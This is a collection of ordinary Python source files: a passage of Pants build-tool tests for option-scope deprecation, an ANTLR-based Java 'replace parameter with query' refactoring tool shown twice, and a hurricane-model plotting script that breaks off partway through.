json.dumps({"foo": [options.for_scope("enum-opt").as_dict()]}, cls=CoercingEncoder)
def test_scope_deprecation(self) -> None:
# Note: This test demonstrates that two different new scopes can deprecate the same
# old scope. I.e., it's possible to split an old scope's options among multiple new scopes.
class DummyOptionable1(Optionable):
options_scope = "new-scope1"
options_scope_category = ScopeInfo.SUBSYSTEM
deprecated_options_scope = "deprecated-scope"
deprecated_options_scope_removal_version = "9999.9.9.dev0"
class DummyOptionable2(Optionable):
options_scope = "new-scope2"
options_scope_category = ScopeInfo.SUBSYSTEM
deprecated_options_scope = "deprecated-scope"
deprecated_options_scope_removal_version = "9999.9.9.dev0"
options = Options.create(
env={},
config=self._create_config(
{
"GLOBAL": {"inherited": "aa"},
DummyOptionable1.options_scope: {"foo": "xx"},
DummyOptionable1.deprecated_options_scope: {
"foo": "yy",
"bar": "zz",
"baz": "ww",
"qux": "uu",
},
}
),
known_scope_infos=[
global_scope(),
DummyOptionable1.get_scope_info(),
DummyOptionable2.get_scope_info(),
],
args=shlex.split("./pants --new-scope1-baz=vv"),
)
options.register(GLOBAL_SCOPE, "--inherited")
options.register(DummyOptionable1.options_scope, "--foo")
options.register(DummyOptionable1.options_scope, "--bar")
options.register(DummyOptionable1.options_scope, "--baz")
options.register(DummyOptionable2.options_scope, "--qux")
with self.warnings_catcher() as w:
vals1 = options.for_scope(DummyOptionable1.options_scope)
# Check that we got a warning, but not for the inherited option.
single_warning_dummy1 = assert_single_element(w)
self.assertEqual(single_warning_dummy1.category, DeprecationWarning)
self.assertNotIn("inherited", str(single_warning_dummy1.message))
# Check values.
# Deprecated scope takes precedence at equal rank.
self.assertEqual("yy", vals1.foo)
self.assertEqual("zz", vals1.bar)
# New scope takes precedence at higher rank.
self.assertEqual("vv", vals1.baz)
with self.warnings_catcher() as w:
vals2 = options.for_scope(DummyOptionable2.options_scope)
# Check that we got a warning.
single_warning_dummy2 = assert_single_element(w)
self.assertEqual(single_warning_dummy2.category, DeprecationWarning)
self.assertNotIn("inherited", str(single_warning_dummy2.message))
# Check values.
self.assertEqual("uu", vals2.qux)
def test_scope_deprecation_parent(self) -> None:
# Note: This test demonstrates that a scope can mark itself as deprecating a subscope of
# another scope.
class DummyOptionable1(Optionable):
options_scope = "test"
options_scope_category = ScopeInfo.SUBSYSTEM
@classmethod
def register_options(cls, register):
super().register_options(register)
register("--bar")
class DummyOptionable2(Optionable):
options_scope = "lint"
options_scope_category = ScopeInfo.SUBSYSTEM
deprecated_options_scope = "test.a-bit-linty"
deprecated_options_scope_removal_version = "9999.9.9.dev0"
@classmethod
def register_options(cls, register):
super().register_options(register)
register("--foo")
known_scope_infos = (
[global_scope()]
+ list(DummyOptionable1.known_scope_infos())
+ list(DummyOptionable2.known_scope_infos())
)
options = Options.create(
env={},
config=self._create_config(),
known_scope_infos=known_scope_infos,
args=shlex.split("./pants --test-a-bit-linty-foo=vv"),
)
# NB: Order matters here, because Optionables are typically registered in sorted order.
DummyOptionable2.register_options_on_scope(options)
DummyOptionable1.register_options_on_scope(options)
with self.warnings_catcher() as w:
vals = options.for_scope(DummyOptionable2.options_scope)
# Check that we got a warning, but also the correct value.
single_warning_dummy1 = assert_single_element(w)
self.assertEqual(single_warning_dummy1.category, DeprecationWarning)
self.assertEqual("vv", vals.foo)
def test_scope_deprecation_defaults(self) -> None:
# Confirms that a DEFAULT option does not trigger deprecation warnings for a deprecated scope.
class DummyOptionable1(Optionable):
options_scope = "new-scope1"
options_scope_category = ScopeInfo.SUBSYSTEM
deprecated_options_scope = "deprecated-scope"
deprecated_options_scope_removal_version = "9999.9.9.dev0"
options = Options.create(
env={},
config=self._create_config(
{"DEFAULT": {"foo": "aa"}, DummyOptionable1.options_scope: {"foo": "xx"}}
),
known_scope_infos=[global_scope(), DummyOptionable1.get_scope_info()],
args=shlex.split("./pants"),
)
options.register(DummyOptionable1.options_scope, "--foo")
with self.warnings_catcher() as w:
vals1 = options.for_scope(DummyOptionable1.options_scope)
# Check that we got no warnings and that the actual scope took precedence.
self.assertEqual(0, len(w))
self.assertEqual("xx", vals1.foo)
def test_scope_dependency_deprecation(self) -> None:
# Test that a dependency scope can be deprecated.
class DummyOptionable1(Optionable):
options_scope = "scope"
options_scope_category = ScopeInfo.SUBSYSTEM
options = Options.create(
env={},
config=self._create_config(),
known_scope_infos=[
global_scope(),
DummyOptionable1.get_scope_info(),
# A deprecated, scoped dependency on `DummyOptionable1`. This
# imitates the construction of SubsystemClientMixin.known_scope_infos.
ScopeInfo(
DummyOptionable1.subscope("sub"),
ScopeInfo.SUBSYSTEM,
DummyOptionable1,
removal_version="9999.9.9.dev0",
removal_hint="Sayonara!",
),
],
args=shlex.split("./pants --scope-sub-foo=vv"),
)
options.register(DummyOptionable1.options_scope, "--foo")
with self.warnings_catcher() as w:
vals1 = options.for_scope(DummyOptionable1.subscope("sub"))
# Check that we got a warning, but also the correct value.
single_warning_dummy1 = assert_single_element(w)
self.assertEqual(single_warning_dummy1.category, DeprecationWarning)
self.assertEqual("vv", vals1.foo)
|
from antlr4 import *
from antlr4.TokenStreamRewriter import TokenStreamRewriter
from gen.java.JavaLexer import JavaLexer
from gen.javaLabeled.JavaParserLabeled import JavaParserLabeled
from gen.javaLabeled.JavaParserLabeledListener import JavaParserLabeledListener
# get method parameters with formalParameters().formalParameterList()
# formal parameters are those which are in method declaration
# parameter in method call are from expressionList/expression
"""
To implement replace parameter with query refactoring:
with consider of removable parameters, find new object in method declaration
Delete target parameters in both method call and declaration
Insert removed parameters in method body.
"""
class ReplaceParameterWithQueryListener(JavaParserLabeledListener):
# constructor
def __init__(self, common_token_stream: CommonTokenStream = None,
target_class: str = None, target_method: str = None,
target_parameters: list = None):
if common_token_stream is None:
raise ValueError("common token stream is None")
else:
self.token_stream_rewriter = TokenStreamRewriter(common_token_stream)
if target_class is None:
raise ValueError("target class is None")
else:
self.target_class = target_class
if target_method is None:
raise ValueError("target method is None")
else:
self.target_method = target_method
if target_parameters is None:
self.target_parameters = []
else:
self.target_parameters = target_parameters
self.current_class = None
self.current_method = None
self.current_method_call = None
self.target_method_obj = None
self.removed_expressions = []
self.local_variables = []
self.add_to_target_method = []
self.index_of_parameter = 0
def enterClassDeclaration(self, ctx: JavaParserLabeled.ClassDeclarationContext):
self.current_class = ctx.IDENTIFIER().getText()
def exitClassDeclaration(self, ctx: JavaParserLabeled.ClassDeclarationContext):
self.current_class = None
def enterMethodDeclaration(self, ctx: JavaParserLabeled.MethodDeclarationContext):
self.current_method = ctx.IDENTIFIER().getText()
if self.current_method == self.target_method and self.current_class == self.target_class:
self.target_method_obj = ctx
def exitMethodDeclaration(self, ctx: JavaParserLabeled.MethodDeclarationContext):
self.FindObjrctIndex()
def enterConstructorDeclaration(self, ctx: JavaParserLabeled.ConstructorDeclarationContext):
self.current_method = ctx.IDENTIFIER().getText()
if self.current_method == self.target_method and self.current_class == self.target_class:
self.target_method_obj = ctx
def exitConstructorDeclaration(self, ctx: JavaParserLabeled.ConstructorDeclarationContext):
self.FindObjrctIndex()
def FindObjrctIndex(self):
i = 0
for expression in self.removed_expressions:
# print("expression",expression.getText())
if type(expression) is JavaParserLabeled.Expression0Context and \
type(expression.primary()) is JavaParserLabeled.Primary4Context:
self.removeExpression(expression)
else:
self.add_to_target_method.append(expression.getText())
# find index of target object
self.index_of_parameter = i
i += 1
self.removed_expressions = []
self.local_variables = []
self.current_method = None
def enterLocalVariableDeclaration(self, ctx: JavaParserLabeled.LocalVariableDeclarationContext):
self.local_variables.append(ctx.getText())
# print(self.local_variables)
# delete in method call
def removeExpression(self, expression):
for local_variable in self.local_variables:
flag = False
variable_declarator = local_variable.variableDeclarators()
# print("$" ,variable_declarator.children)
remaining_variables = []
for i in range(len(variable_declarator.children)):
if i % 2 == 0:
vd = variable_declarator.children[i]
if expression.getText() != vd.variableDeclaratorId().getText():
remaining_variables.append(vd.getText())
else:
self.add_to_target_method.append(vd.variableInitializer().getText())
flag = True
if len(remaining_variables) == 0:
parent_ctx = local_variable.parentCtx
# print("parent",parent_ctx)
self.token_stream_rewriter.delete(
program_name=self.token_stream_rewriter.DEFAULT_PROGRAM_NAME,
from_idx=parent_ctx.start.tokenIndex,
to_idx=parent_ctx.stop.tokenIndex
)
elif len(remaining_variables) < (len(variable_declarator.children) + 1) // 2:
self.token_stream_rewriter.replaceRange(
from_idx=variable_declarator.start.tokenIndex,
to_idx=variable_declarator.stop.tokenIndex,
text=f"{", ".join(remaining_variables)}"
)
if flag:
break
def enterMethodCall0(self, ctx: JavaParserLabeled.MethodCall0Context):
self.current_method_call = ctx.IDENTIFIER().getText()
def exitMethodCall0(self, ctx: JavaParserLabeled.MethodCall0Context):
self.current_method_call = None
# in method call
def enterExpressionList(self, ctx: JavaParserLabeled.ExpressionListContext):
if self.current_method_call == self.target_method:
# print("ex",ctx.getText())
expressions = []
for i in range(len(ctx.children)):
if i % 2 == 0:
if (i // 2) in self.target_parameters:
self.removed_expressions.append(ctx.children[i])
else:
expressions.append(ctx.children[i].getText())
# print(expressions)
# else => ctx.children = ,
self.token_stream_rewriter.replaceRange(
from_idx=ctx.start.tokenIndex,
to_idx=ctx.stop.tokenIndex,
text=f"{", ".join(expressions)}"
)
# method body
def exitCompilationUnit(self, ctx: JavaParserLabeled.CompilationUnitContext):
temp = ""
if self.target_method_obj is not None:
print("self", self.index_of_parameter)
# declaration
ctx = self.target_method_obj
text = ''
formal_parameter_list = ctx.formalParameters().formalParameterList()
print("b", ctx.formalParameters().formalParameterList().getText()[1])
survived_parameters = []
for j in range(len(formal_parameter_list.children)):
# find object name to gain the name, insetr obj name in local variables
if j % 2 == 0:
if (j // 2) not in self.target_parameters:
if j // 2 == self.index_of_parameter:
parameter = formal_parameter_list.children[j]
parameter_vdi = parameter.variableDeclaratorId().getText()
temp = parameter_vdi
for i in range(len(formal_parameter_list.children)):
if i % 2 == 0:
if (i // 2) in self.target_parameters:
parameter = formal_parameter_list.children[i]
parameter_type = parameter.typeType().getText()
parameter_vdi = parameter.variableDeclaratorId().getText()
print("i", i)
print("target", parameter_vdi)
parameter_initializer = self.add_to_target_method[0]
text += parameter_type + ' ' + parameter_vdi + ' = ' + temp + '.' + parameter_vdi \
+ ';' + "\n" + "\t" + "\t"
self.add_to_target_method.remove(parameter_initializer)
else:
parameter = formal_parameter_list.children[i]
parameter_type = parameter.typeType().getText()
parameter_vdi = parameter.variableDeclaratorId().getText()
survived_parameters.append(parameter_type + ' ' + parameter_vdi)
# delete in declarition
self.token_stream_rewriter.replaceRange(
from_idx=formal_parameter_list.start.tokenIndex,
to_idx=formal_parameter_list.stop.tokenIndex,
text=f"{", ".join(survived_parameters)}"
)
block_statement = ctx.methodBody().block().blockStatement()[0]
self.token_stream_rewriter.insertAfter(
index=block_statement.start.tokenIndex - 1,
text=text
)
class ReplaceParameterWithQueryAPI:
def __init__(self, file_path, target_class, target_method, target_parameters):
self.file_path = file_path
self.new_file_path = file_path
self.target_class = target_class
self.target_method = target_method
self.target_parameters = target_parameters
self.stream = FileStream(self.file_path, encoding="utf8")
self.lexer = JavaLexer(self.stream)
self.token_stream = CommonTokenStream(self.lexer)
self.parser = JavaParserLabeled(self.token_stream)
self.tree = self.parser.compilationUnit()
self.walker = ParseTreeWalker()
def do_refactor(self):
listener = ReplaceParameterWithQueryListener(
common_token_stream=self.token_stream,
target_class=self.target_class,
target_method=self.target_method,
target_parameters=self.target_parameters
)
self.walker.walk(
listener=listener,
t=self.tree
)
print(listener.add_to_target_method)
print(listener.token_stream_rewriter.getDefaultText())
with open(self.new_file_path, mode="w", newline="") as f:
f.write(listener.token_stream_rewriter.getDefaultText())
if __name__ == '__main__':
ReplaceParameterWithQueryAPI(
file_path="/data/Dev/JavaSample/src/ReplaceParameterWithQuery.java",
target_class='ReplaceParameterWithQuery',
target_method="availableVacation",
target_parameters=[1, ],
# index from 0
).do_refactor()
| from antlr4 import *
from antlr4.TokenStreamRewriter import TokenStreamRewriter
from gen.java.JavaLexer import JavaLexer
from gen.javaLabeled.JavaParserLabeled import JavaParserLabeled
from gen.javaLabeled.JavaParserLabeledListener import JavaParserLabeledListener
# get method parameters with formalParameters().formalParameterList()
# formal parameters are those which are in method declaration
# parameter in method call are from expressionList/expression
"""
To implement replace parameter with query refactoring:
with consider of removable parameters, find new object in method declaration
Delete target parameters in both method call and declaration
Insert removed parameters in method body.
"""
class ReplaceParameterWithQueryListener(JavaParserLabeledListener):
# constructor
def __init__(self, common_token_stream: CommonTokenStream = None,
target_class: str = None, target_method: str = None,
target_parameters: list = None):
if common_token_stream is None:
raise ValueError("common token stream is None")
else:
self.token_stream_rewriter = TokenStreamRewriter(common_token_stream)
if target_class is None:
raise ValueError("target class is None")
else:
self.target_class = target_class
if target_method is None:
raise ValueError("target method is None")
else:
self.target_method = target_method
if target_parameters is None:
self.target_parameters = []
else:
self.target_parameters = target_parameters
self.current_class = None
self.current_method = None
self.current_method_call = None
self.target_method_obj = None
self.removed_expressions = []
self.local_variables = []
self.add_to_target_method = []
self.index_of_parameter = 0
def enterClassDeclaration(self, ctx: JavaParserLabeled.ClassDeclarationContext):
self.current_class = ctx.IDENTIFIER().getText()
def exitClassDeclaration(self, ctx: JavaParserLabeled.ClassDeclarationContext):
self.current_class = None
def enterMethodDeclaration(self, ctx: JavaParserLabeled.MethodDeclarationContext):
self.current_method = ctx.IDENTIFIER().getText()
if self.current_method == self.target_method and self.current_class == self.target_class:
self.target_method_obj = ctx
def exitMethodDeclaration(self, ctx: JavaParserLabeled.MethodDeclarationContext):
self.FindObjrctIndex()
def enterConstructorDeclaration(self, ctx: JavaParserLabeled.ConstructorDeclarationContext):
self.current_method = ctx.IDENTIFIER().getText()
if self.current_method == self.target_method and self.current_class == self.target_class:
self.target_method_obj = ctx
def exitConstructorDeclaration(self, ctx: JavaParserLabeled.ConstructorDeclarationContext):
self.FindObjrctIndex()
def FindObjrctIndex(self):
i = 0
for expression in self.removed_expressions:
# print("expression",expression.getText())
if type(expression) is JavaParserLabeled.Expression0Context and \
type(expression.primary()) is JavaParserLabeled.Primary4Context:
self.removeExpression(expression)
else:
self.add_to_target_method.append(expression.getText())
# find index of target object
self.index_of_parameter = i
i += 1
self.removed_expressions = []
self.local_variables = []
self.current_method = None
def enterLocalVariableDeclaration(self, ctx: JavaParserLabeled.LocalVariableDeclarationContext):
self.local_variables.append(ctx.getText())
# print(self.local_variables)
# delete in method call
def removeExpression(self, expression):
for local_variable in self.local_variables:
flag = False
variable_declarator = local_variable.variableDeclarators()
# print("$" ,variable_declarator.children)
remaining_variables = []
for i in range(len(variable_declarator.children)):
if i % 2 == 0:
vd = variable_declarator.children[i]
if expression.getText() != vd.variableDeclaratorId().getText():
remaining_variables.append(vd.getText())
else:
self.add_to_target_method.append(vd.variableInitializer().getText())
flag = True
if len(remaining_variables) == 0:
parent_ctx = local_variable.parentCtx
# print("parent",parent_ctx)
self.token_stream_rewriter.delete(
program_name=self.token_stream_rewriter.DEFAULT_PROGRAM_NAME,
from_idx=parent_ctx.start.tokenIndex,
to_idx=parent_ctx.stop.tokenIndex
)
elif len(remaining_variables) < (len(variable_declarator.children) + 1) // 2:
self.token_stream_rewriter.replaceRange(
from_idx=variable_declarator.start.tokenIndex,
to_idx=variable_declarator.stop.tokenIndex,
text=f"{', '.join(remaining_variables)}"
)
if flag:
break
def enterMethodCall0(self, ctx: JavaParserLabeled.MethodCall0Context):
self.current_method_call = ctx.IDENTIFIER().getText()
def exitMethodCall0(self, ctx: JavaParserLabeled.MethodCall0Context):
self.current_method_call = None
# in method call
def enterExpressionList(self, ctx: JavaParserLabeled.ExpressionListContext):
if self.current_method_call == self.target_method:
# print("ex",ctx.getText())
expressions = []
for i in range(len(ctx.children)):
if i % 2 == 0:
if (i // 2) in self.target_parameters:
self.removed_expressions.append(ctx.children[i])
else:
expressions.append(ctx.children[i].getText())
# print(expressions)
# else => ctx.children = ,
self.token_stream_rewriter.replaceRange(
from_idx=ctx.start.tokenIndex,
to_idx=ctx.stop.tokenIndex,
text=f"{', '.join(expressions)}"
)
# method body
def exitCompilationUnit(self, ctx: JavaParserLabeled.CompilationUnitContext):
temp = ""
if self.target_method_obj is not None:
print("self", self.index_of_parameter)
# declaration
ctx = self.target_method_obj
text = ''
formal_parameter_list = ctx.formalParameters().formalParameterList()
print("b", ctx.formalParameters().formalParameterList().getText()[1])
survived_parameters = []
for j in range(len(formal_parameter_list.children)):
# find object name to gain the name, insetr obj name in local variables
if j % 2 == 0:
if (j // 2) not in self.target_parameters:
if j // 2 == self.index_of_parameter:
parameter = formal_parameter_list.children[j]
parameter_vdi = parameter.variableDeclaratorId().getText()
temp = parameter_vdi
for i in range(len(formal_parameter_list.children)):
if i % 2 == 0:
if (i // 2) in self.target_parameters:
parameter = formal_parameter_list.children[i]
parameter_type = parameter.typeType().getText()
parameter_vdi = parameter.variableDeclaratorId().getText()
print("i", i)
print("target", parameter_vdi)
parameter_initializer = self.add_to_target_method[0]
text += parameter_type + ' ' + parameter_vdi + ' = ' + temp + '.' + parameter_vdi \
+ ';' + "\n" + "\t" + "\t"
self.add_to_target_method.remove(parameter_initializer)
else:
parameter = formal_parameter_list.children[i]
parameter_type = parameter.typeType().getText()
parameter_vdi = parameter.variableDeclaratorId().getText()
survived_parameters.append(parameter_type + ' ' + parameter_vdi)
# delete in declarition
self.token_stream_rewriter.replaceRange(
from_idx=formal_parameter_list.start.tokenIndex,
to_idx=formal_parameter_list.stop.tokenIndex,
text=f"{', '.join(survived_parameters)}"
)
block_statement = ctx.methodBody().block().blockStatement()[0]
self.token_stream_rewriter.insertAfter(
index=block_statement.start.tokenIndex - 1,
text=text
)
class ReplaceParameterWithQueryAPI:
def __init__(self, file_path, target_class, target_method, target_parameters):
self.file_path = file_path
self.new_file_path = file_path
self.target_class = target_class
self.target_method = target_method
self.target_parameters = target_parameters
self.stream = FileStream(self.file_path, encoding="utf8")
self.lexer = JavaLexer(self.stream)
self.token_stream = CommonTokenStream(self.lexer)
self.parser = JavaParserLabeled(self.token_stream)
self.tree = self.parser.compilationUnit()
self.walker = ParseTreeWalker()
def do_refactor(self):
listener = ReplaceParameterWithQueryListener(
common_token_stream=self.token_stream,
target_class=self.target_class,
target_method=self.target_method,
target_parameters=self.target_parameters
)
self.walker.walk(
listener=listener,
t=self.tree
)
print(listener.add_to_target_method)
print(listener.token_stream_rewriter.getDefaultText())
with open(self.new_file_path, mode="w", newline="") as f:
f.write(listener.token_stream_rewriter.getDefaultText())
if __name__ == '__main__':
ReplaceParameterWithQueryAPI(
file_path="/data/Dev/JavaSample/src/ReplaceParameterWithQuery.java",
target_class='ReplaceParameterWithQuery',
target_method="availableVacation",
target_parameters=[1, ],
# index from 0
).do_refactor()
|
import csv
import matplotlib.pyplot as plt
import numpy as np
from collections import OrderedDict
import matplotlib as mpl
# import matplotlib.gridspec as gridspec
from matplotlib.ticker import MaxNLocator
from matplotlib.ticker import StrMethodFormatter
import matplotlib.font_manager as font_manager
from matplotlib.patches import Patch
import string
from netCDF4 import Dataset
import json
from cartopy.feature import NaturalEarthFeature
import cartopy.crs as crs
import pickle
from wrf import (to_np, getvar, smooth2d, get_cartopy, cartopy_xlim,
cartopy_ylim, latlon_coords)
import cartopy
import os
from PIL import Image
Image.MAX_IMAGE_PIXELS = None
map_location = "C:/Users/limgr/.spyder-py3/Map"
os.environ["CARTOPY_USER_BACKGROUNDS"] = map_location
# List the colors that will be used for tracing the track.
csfont = {'fontname':'Times New Roman'}
font = font_manager.FontProperties(family='Times New Roman', size=30)
fontbar = font_manager.FontProperties(family='Times New Roman', size=12)
font_wt = font_manager.FontProperties(family='Times New Roman', size=20)
colors = ['k','blue','cyan','gray', 'red', \
'blue', 'cyan', 'lightcoral', 'turquoise','red','blue','green','pink']
patterns = ['-', '--','-.','-',':',':','--','--', ':','-', '--', ':','-', '--', ':',\
'-.', '-.', '-.', ':', '--', '-']
markers = ['s','D','^','o','*','s','+','x','X','D','^','<','>','v']
sizes = [7, 7, 7, 7, 7, 3, 4, 3, 3, 3, 3, 3, 6,5,4,3,2,2]
options = ["Best Track",\
"Clz=0.0001",\
"Clz=0.01",\
"Clz=1",\
"Clz=100"]
models = ["Clz = 0.0001",\
"Clz = 0.01",\
"Clz = 1",\
"Clz = 100"]
hurricanes = ["Katrina",\
"Maria",\
"Irma",\
"Dorian",\
"Lorenzo"]
# subplot positions
position = [[0,0,2],[0,2,4],[0,4,6],[1,0,2],[1,2,4]]
position2 = [[0,4,0,7],[0,4,8,15],[0,4,16,23],[5,9,0,7],[5,9,8,15]]
linestyles = OrderedDict(
[('solid', (0, ())),
('dashdotted', (0, (3, 3, 1, 3))),
('dashdotdotted', (0, (3, 2, 1, 2, 1, 2))),
('dashed', (0, (3, 3))),
('dotted', (0, (1, 3))),
('dashed', (0, (3, 3))),
('loosely dotted', (0, (1, 10))),
('densely dotted', (0, (1, 1))),
('loosely dashed', (0, (5, 10))),
('densely dashed', (0, (5, 1))),
('loosely dashdotted', (0, (3, 10, 1, 10))),
('densely dashdotted', (0, (3, 1, 1, 1))),
('loosely dashdotdotted', (0, (3, 10, 1, 10, 1, 10))),
('densely dashdotdotted', (0, (3, 1, 1, 1, 1, 1)))])
R = 6373.0 # approxiamte radius of earth in km
# folder for wi and wt files
dir_wi = ['C:/Users/limgr/Desktop/Katrina_wind_intensity_16km.csv',\
'C:/Users/limgr/Desktop/Maria_wind_intensity_16km.csv',\
'C:/Users/limgr/Desktop/Irma_wind_intensity_16km.csv',\
'C:/Users/limgr/Desktop/Dorian_wind_intensity_16km.csv',\
'C:/Users/limgr/Desktop/Lorenzo_wind_intensity_16km.csv']
dir_wt = ['C:/Users/limgr/Desktop/Katrina_track_16km.txt',\
'C:/Users/limgr/Desktop/Maria_track_16km.txt',\
'C:/Users/limgr/Desktop/Irma_track_16km.txt',\
'C:/Users/limgr/Desktop/Dorian_track_16km.txt',\
'C:/Users/limgr/Desktop/Lorenzo_track_16km.txt']
dir_p = ['C:/Users/limgr/Desktop/Katrina_16km.p',\
'C:/Users/limgr/Desktop/Maria_16km.p',\
'C:/Users/limgr/Desktop/Irma_16km.p',\
'C:/Users/limgr/Desktop/Dorian_16km.p',\
'C:/Users/limgr/Desktop/Lorenzo_16km.p']
dir_znt_eye = ['C:/Users/limgr/Desktop/Katrina_ZNT_eye_16km.csv',\
'C:/Users/limgr/Desktop/Maria_ZNT_eye_16km.csv',\
'C:/Users/limgr/Desktop/Irma_ZNT_eye_16km.csv',\
'C:/Users/limgr/Desktop/Dorian_ZNT_eye_16km.csv',\
'C:/Users/limgr/Desktop/Lorenzo_ZNT_eye_16km.csv']
dir_znt_eyewall = ['C:/Users/limgr/Desktop/Katrina_ZNT_eyewall_16km.csv',\
'C:/Users/limgr/Desktop/Maria_ZNT_eyewall_16km.csv',\
'C:/Users/limgr/Desktop/Irma_ZNT_eyewall_16km.csv',\
'C:/Users/limgr/Desktop/Dorian_ZNT_eyewall_16km.csv',\
'C:/Users/limgr/Desktop/Lorenzo_ZNT_eyewall_16km.csv']
dir_wp = ['C:/Users/limgr/Desktop/Katrina_avg_speed_16km.csv', \
'C:/Users/limgr/Desktop/Maria_avg_speed_16km.csv', \
'C:/Users/limgr/Desktop/Irma_avg_speed_16km.csv', \
'C:/Users/limgr/Desktop/Dorian_avg_speed_16km.csv', \
'C:/Users/limgr/Desktop/Lorenzo_avg_speed_16km.csv']
lat_log_bound = [[-90.5, -84.5, 23, 29],\
[-74, -68, 19.5, 25.5],\
[-47, -39, 14, 22],\
[-76.5, -70.5, 23, 29],\
[-45.5, -39.5, 16.5, 22.5]]
lat_log_bound = [[-93, -83, 24, 34],\
[-77, -67, 19, 29],\
[-51, -39, 14, 22],\
[-80, -69, 23, 29],\
[-47, -40, 16.5, 25.5]]
lat_log_bound = [[-91, -85, 24, 30],\
[-77, -67, 19, 29],\
[-51, -39, 14, 22],\
[-78, -70, 23, 29],\
[-47, -40, 16.5, 25.5]]
# lat_log_bound = [[-92, -86, 25, 30],\
# [-74, -68, 21.5, 25.5],\
# [-46, -43.5, 17, 19.5],\
# [-76, -73.5, 25.5, 28],\
# [-46, -42, 19, 23]]
def Calculate_Distance_Haversine1(x):
return (np.sin(x[0]/2))**2
def Calculate_Distance_Haversine2(x):
return np.cos(x[0])
def Calculate_Distance_Haversine3(x):
return (np.sin(x[1]/2))**2
#########################################
# Plot normalized intensity time series #
#########################################
fig = plt.figure(figsize=(20,13))
spec = mpl.gridspec.GridSpec(ncols=23, nrows=9)
for kk in range(len(hurricanes)):
c=0
rows=[]
Times=[]
Times=[]
values=[]
with open(dir_wi[kk], mode='r') as csv_file:
csv_reader = csv.DictReader(csv_file)
line_count = 0
for row in csv_reader:
if line_count == 0:
print(f'Column names are {', '.join(row)}')
Times.append(list(row.keys()))
line_count += 1
#print(row)
rows.append(row)
values.append(list(row.values()))
line_count += 1
print(f'Processed {line_count} lines.')
Times0=Times[0]
print(Times0)
print(values[0])
print(position[kk])
ax = fig.add_subplot(spec[position2[kk][0]:position2[kk][1],\
position2[kk][2]:position2[kk][3]])
ax.text(0.05, 0.85, '('+string.ascii_lowercase[kk]+')', transform=ax.transAxes,
size=30, **csfont)
for i in range(0,line_count-1):
if i==0:
tmp=[float(i)*0.5144444 for i in values[i]]
#tmp=[float(i) for i in values[i]]
# elif (i!=2 and i!=3):
else:
tmp=[float(i) for i in values[i]]
# else:
# continue
if hurricanes[kk]=='Katrina':
plt.plot( Times0[:5], tmp[:5], color = colors[c], \
linestyle=list(linestyles.values())[c],\
linewidth=5, markersize=sizes[c])
plt.xticks(fontsize=25, **csfont)
plt.yticks(fontsize=25, **csfont)
plt.ylim([25, 80])
elif hurricanes[kk]=='Dorian':
plt.plot( Times0[:-2], tmp[:-2], color = colors[c], \
linestyle=list(linestyles.values())[c],\
linewidth=5, markersize=sizes[c])
plt.xticks(fontsize=25, **csfont)
plt.yticks(fontsize=25, **csfont)
plt.ylim([25, 80])
else:
plt.plot( Times0, tmp, color = colors[c], \
linestyle=list(linestyles.values())[c],\
linewidth=5, markersize=sizes[c])
plt.xticks(fontsize=25, **csfont)
plt.yticks(fontsize=25, **csfont)
plt.gca().yaxis.set_major_formatter(StrMethodFormatter('{x:,.0f}'))
plt.ylim([25, 80])
c+=1
for axis in ['top','bottom','left','right']:
ax.spines[axis].set_linewidth(2)
ax.tick_params(length=5, width=2)
fig.legend(options, bbox_to_anchor=(0.87, 0.42), prop=font, \
frameon=False)
if kk==0 or kk==3:
plt.ylabel(r'Intensity (m/s)', **csfont, fontsize=35)
if kk==2 or kk==3 or kk==4:
plt.xlabel(r"Time Series (hr)", fontsize=30, **csfont)
plt.title(hurricanes[kk], {'size': 30}, **csfont)
plt.savefig('C:/Users/limgr/Desktop/'+hurricanes[kk]+'_wind_intensity_A.png', dpi=500)
plt.show()
########################
# Plot ZNT time series #
########################
fig = plt.figure(figsize=(20,13))
spec = mpl.gridspec.GridSpec(ncols=23, nrows=9)
for kk in range(len(hurricanes)):
c=0
rows=[]
Times=[]
Times=[]
values=[]
with open(dir_znt_eye[kk], mode='r') as csv_file:
csv_reader = csv.DictReader(csv_file)
line_count = 0
for row in csv_reader:
if line_count == 0:
print(f'Column names are {', '.join(row)}')
Times.append(list(row.keys()))
line_count += 1
#print(row)
rows.append(row)
values.append(list(row.values()))
line_count += 1
print(f'Processed {line_count} lines.')
Times0=Times[0]
print(Times0)
print(values[0])
print(position[kk])
ax = fig.add_subplot(spec[position2[kk][0]:position2[kk][1],\
position2[kk][2]:position2[kk][3]])
ax.text(0.05, 0.85, '('+string.ascii_lowercase[kk]+')', transform=ax.transAxes,
size=30, **csfont)
for i in range(0,line_count-1):
if i==0:
#tmp=[float(i)*0.5144444 for i in values[i]]
tmp=[float(i) for i in values[i]]
# elif (i!=2 and i!=3):
else:
tmp=[float(i) for i in values[i]]
# else:
# continue
if hurricanes[kk]=='Katrina':
plt.plot( Times0[:5], tmp[:5], color = colors[c+1], \
linestyle=list(linestyles.values())[c+1],\
linewidth=5, markersize=sizes[c+1])
plt.xticks(fontsize=25, **csfont)
plt.yticks(fontsize=25, **csfont)
plt.ylim([1e-11, 3.0])
plt.yscale('log')
elif hurricanes[kk]=='Dorian':
plt.plot( Times0[:-2], tmp[:-2], color = colors[c+1], \
linestyle=list(linestyles.values())[c+1],\
linewidth=5, markersize=sizes[c+1])
plt.xticks(fontsize=25, **csfont)
plt.yticks(fontsize=25, **csfont)
plt.ylim([1e-11, 3.0])
plt.yscale('log')
else:
plt.plot( Times0, tmp, color = colors[c+1], \
linestyle=list(linestyles.values())[c+1],\
linewidth=5, markersize=sizes[c+1])
plt.xticks(fontsize=25, **csfont)
plt.yticks(fontsize=25, **csfont)
plt.gca().yaxis.set_major_formatter(StrMethodFormatter('{x:,.0f}'))
plt.ylim([1e-11, 3.0])
plt.yscale('log')
c+=1
for axis in ['top','bottom','left','right']:
ax.spines[axis].set_linewidth(2)
ax.tick_params(length=5, width=2)
fig.legend(models, bbox_to_anchor=(0.87, 0.42), prop=font, \
frameon=False)
if kk==0 or kk==3:
plt.ylabel(r'$Z_0$ (m)', **csfont, fontsize=30)
if kk==2 or kk==3 or kk==4:
plt.xlabel(r"Time Series (hr)", fontsize=30, **csfont)
plt.title(hurricanes[kk], {'size': 30}, **csfont)
plt.savefig('C:/Users/limgr/Desktop/'+hurricanes[kk]+'_ZNT_eye.png', dpi=500)
plt.show()
########################
# Plot ZNT time series #
########################
fig = plt.figure(figsize=(20,13))
spec = mpl.gridspec.GridSpec(ncols=23, nrows=9)
for kk in range(len(hurricanes)):
c=0
rows=[]
Times=[]
Times=[]
values=[]
with open(dir_znt_eyewall[kk], mode='r') as csv_file:
